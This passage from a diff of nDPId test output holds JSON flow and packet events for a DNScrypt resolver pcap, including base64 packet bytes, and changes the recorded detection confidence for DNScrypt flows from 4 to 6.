+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMggAH4RTqEKAAABVQVd5plbIPsGBOYr4+0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":477,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380984} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":477,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAABQVMgAuX4Rc3QKAAABVQVd5gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":478,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380984} 
@@ -970,26 +970,26 @@ 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":946739381021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739381021,"pkt":"ZmZmZmZmRERERERECABFAADPeU5AADQRWShVBV3mCgAAASD7ynIAu49J4\/GBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAQmF4jrNkSB0NiNqctWCLsz9Hoe15aS6mrwyMq15DMDKxowa47TLEyU+dCwefDt3RvbYdetUltVlZd+8gb8kmCcgRT\/L7wkmA5gU0xv13eDWtHcb4jTpxlTH+X73K1n94yBFP8vvCSYAAAAABX1Nm5l9UuGY="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYVAAH4RyuMKAAABi2PeSMWpIPsCCCyCmlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYYgAH4R5yIKAAABi2PeSJ22IPsGBPDSmlQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYcgAH4R5yEKAAABi2PeSMk1IPsGBMVRmlYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":488,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739391046} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":488,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYYAuX4RC\/YKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYhAAH4RyuAKAAABi2PeSLJyIPsCCCyCmlcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 